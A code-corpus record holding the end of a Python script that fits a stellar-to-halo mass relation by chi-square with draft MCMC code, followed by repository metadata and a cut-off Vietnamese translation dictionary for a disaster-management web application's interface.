    # index_Mh = np.argmin(np.abs(hmf_bolshoi[idx_z][:, 0] - log_Mh1))
    # phidirect = 10**hmf_bolshoi[idx_z][index_Mh, 2] * \
    #     (log_Mh1 - log_Mh2)/(logMs1 - logMs2)
    #     return phidirect

    ## Same but with matrices:
    log_Mh1 = logMh(logMs1, M1, Ms0, beta, delta, gamma)
    log_Mh2 = logMh(logMs2, M1, Ms0, beta, delta, gamma)
    # nearest HMF mass bin for each log_Mh1
    index_Mh = np.argmin(np.abs(
        np.tile(hmf_bolshoi[idx_z][:, 0], (len(log_Mh1), 1)) -
        np.transpose(np.tile(log_Mh1, (len(hmf_bolshoi[idx_z][:, 0]), 1)))
    ), axis=1)
    # phi(Ms) = n(Mh) * dlogMh/dlogMs
    phidirect = 10**hmf_bolshoi[idx_z][index_Mh, 2] * (log_Mh1 - log_Mh2)/(logMs1 - logMs2)
    return phidirect


Mmin = 7
Mmax = 16
numpoints = 1000
y = np.linspace(Mmin, Mmax, num=numpoints)


def lognorm(y, logMs, ksi):
    # Gaussian in log mass, i.e. a log-normal scatter of width ksi (in dex)
    return 1 / np.sqrt(2 * np.pi * ksi**2) * np.exp(-(y - logMs)**2 / (2 * ksi**2))


def phi_true(idx_z, logMs, M1, Ms0, beta, delta, gamma, ksi):
    # SMF with a log-normal scatter in stellar mass for a given halo mass.
    # This is the same as convolving phi_direct with a log-normal probability
    # density function.
    # phitrue = 0
    # for i in range(numpoints-1):
    #     phitrue += phi_direct(
    #         y[i], y[i+1], idx_z, M1, Ms0, beta, delta, gamma) * lognorm(y[i], logMs, ksi)

    # phitrue = np.sum(
    #     phi_direct(
    #         y[:-1], y[1:], idx_z, M1, Ms0, beta, delta, gamma) * lognorm(y[:-1], logMs, ksi)
    # )

    # No convolution (no scatter) case:
    phitrue = phi_direct(y[:-1], y[1:], idx_z, M1, Ms0, beta, delta, gamma)
    return phitrue

# def phi_true(idx_z, logMs, M1, Ms0, beta, delta, gamma, ksi):
#     y = np.linspace(Mmin, Mmax, num=numpoints)
#     phidirect = phi_direct(y[1:], y[:-1], idx_z, M1, Ms0, beta, delta, gamma)
#     lognorm = signal.gaussian(50, std=ksi)
#     return np.convolve(phidirect, lognorm, mode='same')

# def phi_expect(z1, z2, logMs, M1, Ms0, beta, delta, gamma, ksi):
#     # Take into account that the observed SMF is for a range of redshifts
#     numpoints = 10
#     redshifts = np.linspace(z1, z2, num=numpoints)
#     top = 0
#     bot = 0
#     for i in range(numpoints - 1):
#         dVc = BP_Cosmo.comoving_volume(redshifts[i+1]) - BP_Cosmo.comoving_volume(redshifts[i])
#         top += phi_true(redshifts[i], logMs, M1, Ms0, beta, delta, gamma, ksi) * dVc
#         bot += dVc
#     return top/bot


def chi2(idx_z, M1, Ms0, beta, delta, gamma, ksi):
    # return the chi**2 between the observed and the expected SMF
    # z1 = redshifts[idx_z]
    # z2 = redshifts[idx_z + 1]
    # logMs = smf_cosmos[idx_z][smf_cosmos[idx_z][:, 1] > -1000, 0]  # select points where the smf is defined
    # numpoints = len(logMs)
    # chi2 = 0
    # for i in range(numpoints):
    #     chi2 += (np.log10(
    #         phi_true(idx_z, logMs[i], M1, Ms0, beta, delta, gamma, ksi) /
    #         10**smf_cosmos[idx_z][i, 1]) / ((smf_cosmos[idx_z][i, 2] + smf_cosmos[idx_z][i, 3])/2))**2

    # Same with matrices: keep only bins where the observed SMF is defined, and
    # interpolate the model SMF (tabulated on the global grid y) onto the
    # observed mass bins so the two arrays are comparable.
    mask = smf_cosmos[idx_z][:, 1] > -1000
    logMs_obs = smf_cosmos[idx_z][mask, 0]
    phi_model = np.interp(logMs_obs, y[:-1],
                          phi_true(idx_z, 0, M1, Ms0, beta, delta, gamma, ksi))
    chi2 = np.sum(
        (np.log10(phi_model / 10**smf_cosmos[idx_z][mask, 1]) /
         ((smf_cosmos[idx_z][mask, 2] + smf_cosmos[idx_z][mask, 3])/2))**2
    )
    return chi2


def negloglike(theta, idx_z):
    # return the negative log-likelihood, i.e. chi2/2
    M1, Ms0, beta, delta, gamma, ksi = theta[:]
    return chi2(idx_z, M1, Ms0, beta, delta, gamma, ksi)/2


##########################################
### Find maximum likelihood estimation ###
##########################################

idx_z = 0
theta0 = np.array([12, 11, 0.5, 0.5, 2.5, 0.15])
bounds = ((10, 14), (8, 13), (0, 2), (0, 3), (0, 5), (0, 1))

# results = op.minimize(negloglike, theta0, args=(idx_z,), bounds=bounds)

print(negloglike(theta0, idx_z))

# bashop = op.basinhopping(negloglike, theta0, niter=2, minimizer_kwargs={'args': idx_z})
# curv = op.curve_fit(phi_true, smf_cosmos[idx_z][smf_cosmos[idx_z][:, 1] > -1000, 0],
#                     10**smf_cosmos[idx_z][:, 1], p0=theta0, sigma=smf_cosmos[idx_z][:, 2])
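
# --- MCMC sketch (not from the original script): a minimal emcee run on top
# --- of negloglike(), assuming the emcee >= 3 API; walker and step counts are
# --- illustrative, not tuned.
# import emcee
#
# def log_prob(theta, idx_z):
#     # flat priors: -inf outside `bounds`, else -chi2/2
#     for val, (low, high) in zip(theta, bounds):
#         if not low < val < high:
#             return -np.inf
#     return -negloglike(theta, idx_z)
#
# nwalkers, ndim = 32, len(theta0)
# p0 = theta0 + 1e-3 * np.random.randn(nwalkers, ndim)
# sampler = emcee.EnsembleSampler(nwalkers, ndim, log_prob, args=(idx_z,))
# sampler.run_mcmc(p0, 1000)
# flat_samples = sampler.get_chain(discard=200, flat=True)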
Gorbagzog/StageIAP
MCMC_SHMR.py
Python
gpl-3.0
7,470
[ "Gaussian" ]
9ff273a0903f01a5dba0fbdb39cc2bee49c828cdae1d7f4e1188584bdd4a69c0
# -*- coding: utf-8 -*- { "'Cancel' will indicate an asset log entry did not occur": "'Hủy' sẽ chỉ dẫn một lệnh nhập không thực hiện được", "A location that specifies the geographic area for this region. This can be a location from the location hierarchy, or a 'group location', or a location that has a boundary for the area.": "Một địa điểm chứa các đặc tính địa lý cho vùng đó. Đó có thể là một địa điểm theo đơn vị hành chính hay 'địa điểm nhóm' hay một địa điểm có đường ranh giới cho vùng đó.", "A volunteer is defined as active if they've participated in an average of 8 or more hours of Program work or Trainings per month in the last year": 'Tình nguyện viên hoạt động tích cực là những người tham gia trung bình từ 8 tiếng hoặc hơn vào các hoạt động của chương trình hay tập huấn một tháng trong năm trước.', "Acronym of the organization's name, eg. IFRC.": 'Từ viết tắt của tên tổ chức, vd IFRC.', "Add Person's Details": 'Thêm thông tin cá nhân', "Address of an image to use for this Layer in the Legend. This allows use of a controlled static image rather than querying the server automatically for what it provides (which won't work through GeoWebCache anyway).": 'Địa chỉ của hình ảnh sử dụng cho Lớp này nằm trong phần ghi chú. Việc này giúp việc sử dụng hình ảnh ổn định được kiểm soát tránh báo cáo tự động gửi tới máy chủ yêu cầu giải thích về nội dung cung cấp (chức năng này không hoạt động thông qua GeoWebCach).', "Authenticate system's Twitter account": 'Xác thực tài khoản Twitter thuộc hệ thống', "Can't import tweepy": 'Không thể nhập khẩu tweepy', "Cancel' will indicate an asset log entry did not occur": "Hủy' có nghĩa là ghi chép nhật ký tài sản không được lưu", "Caution: doesn't respect the framework rules!": 'Cảnh báo: Không tôn trọng các qui đinh khung chương trình', "Children's Education": 'Giáo dục Trẻ em', "Click 'Start' to synchronize with this repository now:": "Bấm nút 'Bắt đầu' để đồng bộ hóa kho dữ liệu bầy giờ", "Click on questions below to select them, then click 'Display Selected Questions' button to view the selected questions for all Completed Assessment Forms": "Bấm vào các câu hỏi phía dưới để chọn, sau đó bấm nút 'Hiển thị các câu hỏi đã chọn' để xem các câu hỏi đã chọn cho tất cả các mẫu Đánh giá hoàn chỉnh", "Don't Know": 'Không biết', "Edit Person's Details": 'Chỉnh sửa thông tin cá nhân', "Enter a name to search for. You may use % as wildcard. Press 'Search' without input to list all items.": "Nhập tên để tìm kiếm. Bạn có thể sử dụng % như là ký tự đặc biệt. Ấn 'Tìm kiếm' mà không nhập giá trị để liệt kê tất cả mặt hàng", "Error No Job ID's provided": 'Lỗi mã nhận dạng công việc không được cung cấp', "Framework added, awaiting administrator's approval": 'Khung chương trình đã được thêm mới, đang chờ phê duyệt của quản trị viên', "Go to %(url)s, sign up & then register your application. You can put any URL in & you only need to select the 'modify the map' permission.": "Đến trang %(url)s, đăng ký & sau đó đăng ký ứng dụng của bạn. Bạn có thể dùng bất cứ đường dẫn URL & chỉ cần chọn 'chức năng cho phép sửa bản đồ'.", "If selected, then this Asset's Location will be updated whenever the Person's Location is updated.": 'Nếu chọn, thì sau đó vị trí tài sản sẽ được cập nhật ngay khi vị trí của người đó được cập nhật.', "If this configuration is displayed on the GIS config menu, give it a name to use in the menu. 
The name for a personal map configuration will be set to the user's name.": 'Nếu cấu hình này được thể hiện trên danh mục cấu hình GIS, đặt tên cho cấu hình để sử dụng trên danh mục. Tên cấu hình bản đồ của cá nhân sẽ được gắn với tên người sử dụng.', "If this field is populated then a user who specifies this Organization when signing up will be assigned as a Staff of this Organization unless their domain doesn't match the domain field.": 'Nếu trường này đã nhiều người khi đó người dùng sẽ chi tiết tổ chức lúc đó việc đăng ký sẽ được phân bổ như là Cán bộ của tổ chức trừ phi chức năng đó không phù hợp.', "If you don't see the Cluster in the list, you can add a new one by clicking link 'Create Cluster'.": "Nếu bạn không tìm thấy tên Nhóm trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm nhóm'", "If you don't see the Organization in the list, you can add a new one by clicking link 'Create Organization'.": "Nếu bạn không tìm thấy tên Tổ chức trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm tổ chức'", "If you don't see the Sector in the list, you can add a new one by clicking link 'Create Sector'.": "Nếu bạn không tìm thấy Lĩnh vực trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm lĩnh vực'", "If you don't see the Type in the list, you can add a new one by clicking link 'Create Office Type'.": "Nếu bạn không tìm thấy Loại hình văn phòng trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm loại hình văn phòng'", "If you don't see the Type in the list, you can add a new one by clicking link 'Create Organization Type'.": "Nếu bạn không tìm thấy tên Loại hình tổ chức trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm loại hình tổ chức'", "If you don't see the activity in the list, you can add a new one by clicking link 'Create Activity'.": "Nếu bạn không tìm thấy hoạt động trong danh sách, bạn có thể thêm một bằng cách ấn nút 'Thêm hoạt động'", "If you don't see the asset in the list, you can add a new one by clicking link 'Create Asset'.": "Nếu bạn không tìm thấy tài sản trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm tài sản'", "If you don't see the beneficiary in the list, you can add a new one by clicking link 'Add Beneficiaries'.": "Nếu bạn không tìm thấy tên người hưởng lợi trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm người hưởng lợi'", "If you don't see the community in the list, you can add a new one by clicking link 'Create Community'.": "Nếu bạn không thấy Cộng đồng trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm cộng đồng'", "If you don't see the location in the list, you can add a new one by clicking link 'Create Location'.": "Nếu bạn không thấy Địa điểm trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm địa điểm'", "If you don't see the project in the list, you can add a new one by clicking link 'Create Project'.": "Nếu bạn không thấy dự án trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm dự án'", "If you don't see the type in the list, you can add a new one by clicking link 'Create Activity Type'.": "Nếu bạn không thấy loại hình hoạt động trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm loại hình hoạt động'", "If you don't see the vehicle in the list, you can add a new one by clicking link 'Add Vehicle'.": "Nếu bạn không thấy phương tiện vận chuyển trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm phương tiện vận chuyển'", "If you enter a foldername then the layer will appear in this folder in the Map's layer switcher.": 'Nếu bạn nhập tên thư mục sau đó lớp 
đó sẽ hiện ra trong thư mục trong nút chuyển lớp Bản đồ.', "Last Week's Work": 'Công việc của tuấn trước', "Level is higher than parent's": 'Cấp độ cao hơn cấp độ gốc', "List Persons' Details": 'Liệt kê thông tin cá nhân', "Need a 'url' argument!": "Cần đối số cho 'url'!", "No UTC offset found. Please set UTC offset in your 'User Profile' details. Example: UTC+0530": "Không có thời gian bù UTC được tìm thấy. Cài đặt thời gian bù UTC trong thông tin 'Hồ sơ người sử dụng' của bạn. Ví dụ: UTC+0530", "Only Categories of type 'Vehicle' will be seen in the dropdown.": "Chỉ những hạng mục thuộc 'Xe cộ' được thể hiện trong danh sách thả xuống", "Optional. The name of the geometry column. In PostGIS this defaults to 'the_geom'.": "Tùy chọn. Tên của cột hình dạng. Trong PostGIS tên này được mặc định là 'the_geom'.", "Parent level should be higher than this record's level. Parent level is": 'Mức độ cấp trên phải cao hơn mức độ của bản lưu này. Mức độ cấp trên là', "Password fields don't match": 'Trường mật khẩu không tương thích', "Person's Details added": 'Thông tin được thêm vào của cá nhân', "Person's Details deleted": 'Thông tin đã xóa của cá nhân', "Person's Details updated": 'Thông tin được cập nhật của cá nhân', "Person's Details": 'Thông tin cá nhân', "Persons' Details": 'Thông tin cá nhân', "Phone number to donate to this organization's relief efforts.": 'Số điện thoại để ủng hộ cho những nỗ lực cứu trợ của tổ chức này', "Please come back after sometime if that doesn't help.": 'Xin vui lòng quay trở lại sau nếu điều đó không giúp ích bạn.', "Please provide as much detail as you can, including the URL(s) where the bug occurs or you'd like the new feature to go.": 'Xin vui lòng cung cấp thông tin chi tiết nhất có thể, bao gồm những đường dẫn URL chứa các lỗi kỹ thuật hay bạn muốn thực hiện chức năng mới.', "Post graduate (Doctor's)": 'Tiến sỹ', "Post graduate (Master's)": 'Thạc sỹ', "Quantity in %s's Warehouse": 'Số lượng trong %s Nhà kho', "Search Person's Details": 'Tìm kiếm thông tin cá nhân', "Select a Facility Type from the list or click 'Create Facility Type'": "Chọn loại hình bộ phận từ danh sách hoặc bấm 'Thêm loại hình bộ phận'", "Select a Room from the list or click 'Create Room'": "Chọn một Phòng từ danh sách hay bấm 'Thêm Phòng'", "Select this if all specific locations need a parent at the deepest level of the location hierarchy. For example, if 'district' is the smallest division in the hierarchy, then all specific locations would be required to have a district as a parent.": "Chọn nó nếu tất cả các điểm cụ thể cần lớp cao nhất trong hệ thống hành chính các địa điểm. Ví dụ, nếu 'là lớp huyện' là phân chia nhỏ nhất trong hệ thống, do vậy các địa điểm cụ thể sẽ yêu cầu có lớp huyện là lớp trên.", "Select this if all specific locations need a parent location in the location hierarchy. This can assist in setting up a 'region' representing an affected area.": 'Chọn nó nếu tất cả các điểm cụ thể cần lớp trên trong hệ thống hành chính các địa điểm. Nó có thể giúp lập nên một vùng diện cho một vùng bị ảnh hưởng. 
', "Sorry, things didn't get done on time.": 'Xin lỗi, công việc đã không được làm đúng lúc.', "Sorry, we couldn't find that page.": 'Xin lỗi, chúng tôi không thể tìm thấy trang đó', "Status 'assigned' requires the %(fieldname)s to not be blank": "Tình trạng 'được bổ nhiệm' đòi hỏi %(fieldname)s không được bỏ trống", "System's Twitter account updated": 'Tài khoản Twitter của Hệ thống được cập nhật', "The Project module can be used to record Project Information and generate Who's Doing What Where reports.": 'Mô đun Dự án có thể được sử dụng để ghi lại Thông tin Dự án và cho ra các báo cáo Ai Đang làm Điều gì Ở đâu.', "The URL of the image file. If you don't upload an image file, then you must specify its location here.": 'Đường dẫn URL của tệp tin hình ảnh. Nếu bạn không tải tệp tin hình ảnh lên, thì bạn phải đưa đường dẫn tới vị trí của tệp tin đó tại đây.', "The person's manager within this Office/Project.": 'Quản lý của một cá nhân trong Văn phòng/Dự án', "The staff member's official job title": 'Chức vụ chính thức của cán bộ', "The volunteer's role": 'Vai trò của tình nguyện viên', "There are no details for this person yet. Add Person's Details.": 'Chưa có thông tin về người này. Hãy thêm Thông tin.', "To search for a hospital, enter any part of the name or ID. You may use % as wildcard. Press 'Search' without input to list all hospitals.": 'Để tìm kiếm một bệnh viện, nhập một phần tên hoặc ID. Có thể sử dụng % như một ký tự thay thế cho một nhóm ký tự. Nhấn "Tìm kiếm" mà không nhập thông tin, sẽ hiển thị toàn bộ các bệnh viện.', "To search for a location, enter the name. You may use % as wildcard. Press 'Search' without input to list all locations.": "Dể tìm kiếm địa điểm, nhập tên của địa điểm đó. Bản có thể sử dụng ký tự % như là ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập tên địa điểm để liệt kê toàn bộ địa điểm.", "To search for a member, enter any portion of the name of the person or group. You may use % as wildcard. Press 'Search' without input to list all members": "Để tìm thành viên, nhập tên của thành viên hoặc nhóm. Bạn có thể sử dụng % như là ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập tên để liệt toàn bộ thành viên", "To search for a person, enter any of the first, middle or last names and/or an ID number of a person, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons.": "Để tìm kiếm người, nhập bất kỳ tên, tên đệm hoặc tên họ và/ hoặc số nhận dạng cá nhân của người đó, tách nhau bởi dấu cách. Ấn nút 'Tìm kiếm' mà không nhập tên người để liệt kê toàn bộ người.", "Type the first few characters of one of the Participant's names.": 'Nhập những ký tự đầu tiên trong tên của một Người tham dự.', "Type the first few characters of one of the Person's names.": 'Nhập những ký tự đầu tiên trong tên của một Người.', "Type the name of an existing catalog item OR Click 'Create Item' to add an item which is not in the catalog.": "Nhập tên của một mặt hàng trong danh mục đang tồn tại HOẶC Nhấn 'Thêm mặt hàng mới' để thêm một mặt hàng chưa có trong danh mục.", "Upload an image file here. If you don't upload an image file, then you must specify its location in the URL field.": 'Tải lên file hình ảnh tại đây. Nếu bạn không đăng tải được file hình ảnh, bạn phải chỉ đường dẫn chính xác tới vị trí của file trong trường URL.', "Uploaded file(s) are not Image(s). Supported image formats are '.png', '.jpg', '.bmp', '.gif'.": "File được tải không phải là hình ảnh. 
Định dạng hình ảnh hỗ trợ là '.png', '.jpg', '.bmp', '.gif'", "View and/or update details of the person's record": 'Xem và/hoặc cập nhật chi tiết mục ghi cá nhân', """Welcome to %(system_name)s - You can start using %(system_name)s at: %(url)s - To edit your profile go to: %(url)s%(profile)s Thank you""": """Chào mừng anh/chị truy cập %(system_name)s Anh/chị có thể bắt đầu sử dụng %(system_name)s tại %(url)s Để chỉnh sửa hồ sơ của anh/chị, xin vui lòng truy cập %(url)s%(profile)s Cảm ơn""", "Yes, No, Don't Know": 'Có, Không, Không biết', "You can search by asset number, item description or comments. You may use % as wildcard. Press 'Search' without input to list all assets.": "Bạn có thể tìm kiếm theo mã số tài sản, mô tả mặt hàng hoặc các bình luận. Bạn có thể sử dụng % làm ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập giá trị để liệt kê tất cả tài sản.", "You can search by course name, venue name or event comments. You may use % as wildcard. Press 'Search' without input to list all events.": "Bạn có thể tìm kiếm theo tên khóa học, tên địa điểm tổ chức hoặc bình luận về khóa học. Bạn có thể sử dụng % làm ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập giá trị để liệt kê tất cả khóa học.", "You can search by description. You may use % as wildcard. Press 'Search' without input to list all incidents.": "Bạn có thể tìm kiếm theo mô tả. Bạn có thể sử dụng % làm ký tự đại diện. Không nhập thông tin và nhấn 'Tìm kiếm' để liệt kê tất cả các sự kiện.", "You can search by job title or person name - enter any of the first, middle or last names, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons.": "Bạn có thể tìm kiếm theo chức vụ nghề nghiệp hoặc theo tên đối tượng - nhập bất kỳ tên nào trong tên chính, tên đệm hay họ, tách nhau bởi dấu cách. Bạn có thể sử dụng % làm ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập giá trị để liệt kê tất cả đối tượng.", "You can search by person name - enter any of the first, middle or last names, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons.": "Bạn có thể tìm kiếm theo tên người - nhập bất kỳ tên, tên đệm hay tên họ, tách nhau bởi dấu cách. Bạn có thể sử dụng % làm ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập giá trị để liệt kê tất cả số người.", "You can search by trainee name, course name or comments. You may use % as wildcard. Press 'Search' without input to list all trainees.": "Bạn có thể tìm kiếm bằng tên người được tập huấn, tên khóa học hoặc các bình luận. Bạn có thể sử dụng % làm ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập giá trị để liệt kê tất cả người được tập huấn.", "You have personalised settings, so changes made here won't be visible to you. To change your personalised settings, click ": 'Bạn đã thiết lập các cài đặt cá nhân, vì vậy bạn không xem được các thay đổi ở đây.Để thiết lập lại, nhấp chuột vào', "You have unsaved changes. Click Cancel now, then 'Save' to save them. Click OK now to discard them.": "Bạn chưa lưu các thay đổi. Ấn 'Hủy bỏ' bây giờ, sau đó ấn 'Lưu' để lưu lại. 
Ấn OK bây giờ để bỏ các thay đổi", "communications systems, health facilities, 'lifelines', power and energy, emergency evacuation shelters, financial infrastructure, schools, transportation, waste disposal, water supp": 'hệ thống thông tin liên lạc, cơ sở CSSK, hệ thống bảo hộ, năng lượng, các địa điểm sơ tán trong tình huống khẩn cấp, hạ tầng tài chính, trường học, giao thông, bãi rác thải, hệ thống cấp nước', '"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"cập nhật" là một lựa chọn như "Thực địa1=\'giá trị mới\'". Bạn không thể cập nhật hay xóa các kết quả của một NHÓM', '# of Houses Damaged': 'Số nóc nhà bị phá hủy', '# of Houses Destroyed': 'Số căn nhà bị phá hủy', '# of International Staff': 'số lượng cán bộ quốc tế', '# of National Staff': 'số lượng cán bộ trong nước', '# of People Affected': 'Số người bị ảnh hưởng', '# of People Injured': 'Số lượng người bị thương', '%(GRN)s Number': '%(GRN)s Số', '%(GRN)s Status': '%(GRN)s Tình trạng', '%(PO)s Number': '%(PO)s Số', '%(REQ)s Number': '%(REQ)s Số', '%(app)s not installed. Ask the Server Administrator to install on Server.': '%(app)s dụng chưa được cài. Liên hệ với ban quản trị máy chủ để cài ứng dụng trên máy chủ', '%(count)s Entries Found': '%(count)s Hồ sơ được tìm thấy', '%(count)s Roles of the user removed': '%(count)s Đã gỡ bỏ chức năng của người sử dụng', '%(count)s Users removed from Role': '%(count)s Đã xóa người sử dụng khỏi chức năng', '%(count_of)d translations have been imported to the %(language)s language file': '%(count_of)d bản dịch được nhập liệu trong %(language)s file ngôn ngữ', '%(item)s requested from %(site)s': '%(item)s đề nghị từ %(site)s', '%(module)s not installed': '%(module)s chưa được cài đặt', '%(pe)s in %(location)s': '%(pe)s tại %(location)s', '%(quantity)s in stock': '%(quantity)s hàng lưu kho', '%(system_name)s has sent an email to %(email)s to verify your email address.\nPlease check your email to verify this address. If you do not receive this email please check you junk email or spam filters.': '%(system_name)s đã gửi email đến %(email)s để kiểm tra địa chỉ email của bạn.\nĐề nghị kiểm tra email để xác nhận. Nếu bạn không nhận được hãy kiểm tra hộp thư rác hay bộ lọc thư rác.', '%s items are attached to this shipment': '%s hàng hóa được chuyển trong đợt xuất hàng này', '& then click on the map below to adjust the Lat/Lon fields': '& sau đó chọn trên bản đồ để chính sửa số kinh/vĩ độ', '(filtered from _MAX_ total entries)': '(lọc từ _MAX_ toàn bộ hồ sơ)', '* Required Fields': '* Bắt buộc phải điền', '...or add a new bin': '…hoặc thêm một ngăn mới', '1 Assessment': '1 Đánh giá', '1 location, shorter time, can contain multiple Tasks': '1 địa điểm, thời gian ngắn hơn, có thể bao gồm nhiều nhiệm vụ khác nhau', '1. Fill the necessary fields in BLOCK CAPITAL letters.': '1. Điền nội dung vào các ô cần thiết bằng CHỮ IN HOA.', '2. Always use one box per letter and leave one box space to separate words.': '2. Luôn sử dụng một ô cho một chữ cái và để một ô trống để cách giữa các từ', '3. Fill in the circles completely.': '3. 
Điền đầy đủ vào các ô tròn', '3W Report': 'Báo cáo 3W', 'A Marker assigned to an individual Location is set if there is a need to override the Marker assigned to the Feature Class.': 'Một đánh dấu cho một vị trí đơn lẻ nếu cần thiết để thay thế một Đánh dấu theo chức năng.', 'A brief description of the group (optional)': 'Mô tả ngắn gọn nhóm đánh giá (không bắt buộc)', 'A catalog of different Assessment Templates including summary information': 'Danh mục các biểu mẫu đánh giá khác nhau bao gồm cả thông tin tóm tắt', 'A file in GPX format taken from a GPS.': 'file định dạng GPX từ máy định vị GPS.', 'A place within a Site like a Shelf, room, bin number etc.': 'Một nơi trên site như số ngăn ,số phòng,số thùng v.v', 'A project milestone marks a significant date in the calendar which shows that progress towards the overall objective is being made.': 'Một mốc quan trọng của dự án đánh dấu ngày quan trọng trong lịch để chỉ ra tiến độ đạt được mục tổng quát của dự án.', 'A snapshot of the location or additional documents that contain supplementary information about the Site can be uploaded here.': 'Upload ảnh chụp vị trí hoặc tài liệu bổ sung chứa thông tin bổ sung về trang web tại đây', 'A staff member may have multiple roles in addition to their formal job title.': 'Một cán bộ có thể có nhiều chức năng nhiệm vụ bổ sung thêm vào chức năng nhiệm vụ chính.', 'A strict location hierarchy cannot have gaps.': 'Thứ tự vi trí đúng không thể có khoảng cách.', 'A survey series with id %s does not exist. Please go back and create one.': 'Chuỗi khảo sát số %s không tồn tai.Vui lòng quay lại và tạo mới', 'A task is a piece of work that an individual or team can do in 1-2 days.': 'Nhiệm vụ là công việc mà một cá nhân hoặc nhóm có thể thực hiện trong 1-2 ngày.', 'A volunteer may have multiple roles in addition to their formal job title.': 'Một tình nguyện viên có thể có nhiều chức năng nhiệm vụ bổ sung thêm vào chức năng nhiệm vụ chính.', 'ABOUT CALCULATIONS': 'TẠM TÍNH', 'ABOUT THIS MODULE': 'Giới thiệu Module này', 'ABSOLUTE%(br)sDEVIATION': 'HOÀN TOÀN%(br)sCHỆCH HƯỚNG', 'ACTION REQUIRED': 'HÀNH ĐỘNG ĐƯỢC YÊU CẦU', 'ALL REPORTS': 'TẤT CẢ BÁO CÁO', 'ALL': 'Tất cả', 'ANY': 'BẤT KỲ', 'API is documented here': 'API được lưu trữ ở đây', 'APPROVE REPORTS': 'PHÊ DUYỆT BÁO CÁO', 'AUTH TOKEN': 'THẺ XÁC THỰC', 'Abbreviation': 'Từ viết tắt', 'Ability to customize the list of human resource tracked at a Shelter': 'Khả năng tùy chỉnh danh sách nguồn nhân lực theo dõi tại nơi cư trú', 'Ability to customize the list of important facilities needed at a Shelter': 'Khả năng tùy chỉnh danh sách các điều kiện quan trọng cần thiết tại một cơ sở cư trú', 'Able to Respond?': 'Có khả năng ứng phó không?', 'About Us': 'Giới thiệu', 'About': 'Khoảng', 'Accept Push': 'Chấp nhận Đẩy', 'Accept unsolicited data transmissions from the repository.': 'Chấp nhận truyền các dữ liệu chưa tổng hợp từ kho dữ liệu.', 'Access denied': 'Từ chối truy cập', 'Account Name': 'Tên tài khoản', 'Account Registered - Please Check Your Email': 'Tài khoản đã được đăng ký- Kiểm tra email của bạn', 'Achieved': 'Thành công', 'Acronym': 'Từ viết tắt', 'Action': 'Hành động', 'Actioning officer': 'Cán bộ hành động', 'Actions taken as a result of this request.': 'Hành động được thực hiện như là kết quả của yêu cầu này.', 'Actions': 'Hành động', 'Activate': 'Kích hoạt', 'Active Problems': 'Có vấn đề kích hoạt', 'Active': 'Đang hoạt động', 'Active?': 'Đang hoạt động?', 'Activities matching Assessments': 'Hoạt động phù hợp với Đánh giá', 'Activities': 'Hoạt động', 
'Activity Added': 'Hoạt động đã được thêm mới', 'Activity Deleted': 'Hoạt động đã được xóa', 'Activity Details': 'Chi tiết hoạt động', 'Activity Report': 'Báo cáo hoạt động', 'Activity Type Added': 'Loại hình hoạt động đã được thêm mới', 'Activity Type Deleted': 'Loại hình hoạt động đã được xóa', 'Activity Type Sectors': 'Lĩnh vực của loại hình hoạt động', 'Activity Type Updated': 'Loại hình hoạt động đã được cập nhật', 'Activity Type': 'Hoạt động', 'Activity Types': 'Hoạt động', 'Activity Updated': 'Hoạt động đã được cập nhật', 'Activity': 'Hoạt động', 'Add Activity Type': 'Thêm loại hình hoạt động', 'Add Address': 'Thêm địa chỉ', 'Add Affiliation': 'Thêm liên kết', 'Add Aid Request': 'Thêm yêu cầu cứu trợ', 'Add Alternative Item': 'Thêm mặt hàng thay thế', 'Add Annual Budget': 'Thêm ngân sách năm', 'Add Assessment Answer': 'Thêm câu trả lời đánh giá', 'Add Assessment Templates': 'Thêm biểu mẫu đánh giá', 'Add Assessment': 'Thêm đợt đánh giá', 'Add Award': 'Thêm mới', 'Add Beneficiaries': 'Thêm người hưởng lợi', 'Add Branch Organization': 'Thêm tổ chức cấp tỉnh/ huyện/ xã', 'Add Certificate for Course': 'Thêm chứng nhận khóa tập huấn', 'Add Certification': 'Thêm bằng cấp', 'Add Contact Information': 'Thêm thông tin liên hệ', 'Add Contact': 'Thêm liên lạc', 'Add Credential': 'Thêm thư ủy nhiệm', 'Add Data to Theme Layer': 'Thêm dữ liệu vào lớp chủ đề', 'Add Demographic Data': 'Thêm số liệu dân số', 'Add Demographic Source': 'Thêm nguồn thông tin dân số', 'Add Demographic': 'Thêm dữ liệu nhân khẩu', 'Add Disciplinary Action': 'Thêm mới', 'Add Disciplinary Action Type': 'Thêm hình thức kỷ luật', 'Add Distribution': 'Thêm thông tin hàng hóa đóng góp', 'Add Donor': 'Thêm tên người quyên góp vào danh sách', 'Add Education': 'Thêm trình độ học vấn', 'Add Email Settings': 'Thêm cài đặt email', 'Add Employment': 'Thêm mới', 'Add Framework': 'Thêm khung chương trình', 'Add Group Member': 'Thêm thành viên nhóm', 'Add Hours': 'Thêm thời gian hoạt động', 'Add Identity': 'Thêm nhận dạng', 'Add Image': 'Thêm hình ảnh', 'Add Item Catalog': 'Thêm danh mục hàng hóa', 'Add Item to Catalog': 'Thêm hàng hóa vào danh mục', 'Add Item to Commitment': 'Thêm hàng hóa vào cam kết', 'Add Item to Request': 'Thêm hàng hóa mới để 